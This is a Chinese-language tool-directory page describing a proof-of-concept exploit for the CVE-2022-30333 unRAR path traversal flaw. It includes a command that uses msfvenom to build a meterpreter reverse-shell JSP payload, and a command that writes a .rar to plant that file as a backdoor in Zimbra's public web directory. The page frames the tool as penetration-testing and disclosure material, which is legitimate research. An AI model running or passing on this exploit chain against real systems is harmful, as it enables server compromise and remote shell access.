Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
unrar-cve-2022-30333-poc — 针对unRAR中CVE-2022-30333路径遍历漏洞的概念验证利用程序,生成恶意.rar文件,将有效载荷植入任意位置。与Metasploit和msfvenom集成,用于渗透测试。 | Kitploit
工具/GitHubGitHub/rbowes-r7/unrar-cve-2022-30333-poc
漏洞利用框架Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubrbowes-r7/unrar-cve-2022-30333-poc

unrar-cve-2022-30333-poc

针对unRAR中CVE-2022-30333路径遍历漏洞的概念验证利用程序,生成恶意.rar文件,将有效载荷植入任意位置。与Metasploit和msfvenom集成,用于渗透测试。

查看仓库
14514年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

一个针对 CVE-2022-30333 的概念验证——这是 unRAR 6.11 之前版本中的一个路径遍历漏洞。我编写此工具是为了在 AttackerKB 的讨论中演示该漏洞的利用方式,并计划尽快将其整合进 Metasploit 模块中!

基本上,你只需提供一个目标路径(包括路径遍历)和某些文件数据,此工具就会生成一个 .rar 文件,该文件在解压时会将指定数据写入目标位置。文件名最大长度为 104 字节,文件数据最大长度为 4096 字节。(这并非漏洞本身限制,只是我在生成文件时设定的参数)。

例如,使用 msfvenom 生成一个后门:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

然后创建一个 .rar 文件,将 .jsp 文件植入某个有趣的位置:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
下载工具